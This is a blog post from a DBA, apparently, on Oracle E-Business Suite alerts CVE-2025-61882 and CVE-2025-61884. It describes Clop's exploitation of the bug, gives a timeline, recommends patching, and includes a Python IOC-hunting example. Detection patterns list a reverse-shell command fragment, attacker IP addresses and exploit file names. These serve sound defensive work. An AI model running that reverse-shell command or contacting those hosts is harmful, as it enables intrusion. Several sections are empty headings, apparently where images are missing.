Sunday, 23 November 2025

CVE-2025-61882 and CVE-2025-61884: Oracle E-Business Suite Security Alerts addressing vulnerabilities in R12.2

 Dear All,

In this post I am sharing details related to the Oracle E-Business Suite Security Alerts that address vulnerabilities in R12.2 versions, which were reported recently, in this year 2025.

Vulnerability in EBS R12.2 versions.

CVE-2025-61882:

The vulnerability lies in the BI Publisher Integration component of Oracle’s Concurrent Processing module, part of EBS versions 12.2.3 through 12.2.14. It allows unauthenticated attackers to send specially crafted HTTP requests that lead to remote code execution on the affected server.


Critical unauthenticated remote code execution (RCE) in Oracle E-Business Suite (EBS)

> Actively exploited in Clop-led data theft and extortion attacks

> Exploit and Oracle source code leaked publicly

> Emergency patch released

 

Oracle has released an emergency patch for a critical zero-day vulnerability in Oracle E-Business Suite, tracked as CVE-2025-61882. The flaw, with a CVSS score of 9.8, allows attackers to execute arbitrary code remotely without authentication.

Reports from Oracle, Mandiant, and independent researchers confirm the vulnerability has been actively exploited in campaigns by the Clop ransomware group (ransomware is a type of malicious software, or malware), leading to large-scale data theft and extortion. Public indicators of compromise (IOCs) now match exploit code that leaked on Telegram, confirming this is the same vulnerability used in recent attacks.


 





https://support.oracle.com/epmos/faces/DocumentDisplay?_afrLoop=274578431489086&id=3106344.1&_afrWindowMode=0&_adf.ctrl-state=1a0ce4gyc8_53

EBS R12.2 Environment :


EBS R12.1.3 Environment : 


 

CVE-2025-61884:






https://support.oracle.com/epmos/faces/DocumentDisplay?_afrLoop=274764861518353&id=3107176.1&_afrWindowMode=0&_adf.ctrl-state=1a0ce4gyc8_102




 



Post the 884 fixup we may see this issue; you can apply the given patch to fix that issue.


Recommended actions

  • Patch immediately: Apply Oracle’s Security Alert update for CVE-2025-61882. Ensure the October 2025 Critical Patch Update is installed first.
  • Hunt for the following IOCs: Reverse shell commands (/bin/bash -i >& /dev/tcp), unexpected child processes from the EBS Java service, the IPs 200.107.207.26 and 185.181.60.11, and presence of files exp.py, server.py, or oracle_ebs_nday_exploit*.zip.
  • Review access exposure: Identify any externally accessible EBS instances or outdated versions.
  • Increase runtime visibility: Monitor for process and library behavior within application workloads, not just endpoints.
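One way to run the IOC hunt from the list above over collected log lines, as an added example that is not Oracle's or Mandiant's tooling. The log formats, the sample lines and the names `IOC_PATTERNS`, `SAMPLE_LINES` and `hunt` are assumptions made for illustration; only the IOC strings come from this post.

```python
import re

# IOC strings are the ones listed in the recommended actions above.
IOC_PATTERNS = {
    # Reverse shell: tolerate variable spacing around the redirect.
    "reverse_shell": re.compile(r"/bin/bash\s+-i\s*>&\s*/dev/tcp"),
    # IPs: boundaries so that 185.181.60.110 is not reported as 185.181.60.11.
    "ioc_ip": re.compile(
        r"(?<![\d.])(?:200\.107\.207\.26|185\.181\.60\.11)(?!\.?\d)"
    ),
    # File names: whole path component only, so webserver.py does not match.
    # The * in oracle_ebs_nday_exploit*.zip is limited to file-name characters.
    "ioc_file": re.compile(
        r"(?<![\w.-])(?:exp\.py|server\.py|oracle_ebs_nday_exploit[\w.-]*\.zip)(?![\w.-])"
    ),
}

# Constructed sample lines in assumed log formats, not real telemetry.
SAMPLE_LINES = [
    'type=EXECVE pid=4121 ppid=3990 cmd="sh -c /bin/bash  -i >& /dev/tcp/<host>/<port>"',
    '185.181.60.11 - - [05/Oct/2025:10:11:12 +0000] "POST /<path> HTTP/1.1" 200 512',
    '185.181.60.110 - - [05/Oct/2025:10:11:13 +0000] "GET /<path> HTTP/1.1" 200 80',
    "open path=/tmp/oracle_ebs_nday_exploit_copy.zip uid=1001",
    "open path=/u01/app/webserver.py uid=1001",
    "open path=/tmp/exp.py uid=1001",
]


def hunt(lines):
    """Return (line_number, ioc_category, matched_text) for every IOC hit."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for category, pattern in IOC_PATTERNS.items():
            for match in pattern.finditer(line):
                hits.append((number, category, match.group(0)))
    return hits


if __name__ == "__main__":
    for number, category, text in hunt(SAMPLE_LINES):
        print(f"line {number}: {category}: {text}")
```

File names such as exp.py and server.py are generic, so a hit on them alone needs triage against path, owner and timestamp before it is treated as a compromise.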

 

 

  • June 2025: Dark Web posts advertise an Oracle EBS zero-day exploit for sale (~$70,000).
  • August 2025: Clop begins an extortion campaign targeting EBS servers across multiple organizations.
  • October 4, 2025: Oracle publishes a Security Alert for CVE-2025-61882 and releases an emergency patch.
  • October 5, 2025: Mandiant confirms Clop leveraged both previously patched July vulnerabilities and this new zero-day.
  • October 6, 2025: Exploit archive and partial Oracle source code leaked by a group calling itself Scattered Lapsus$ Hunters.


Important dates:



Thanks,

Srini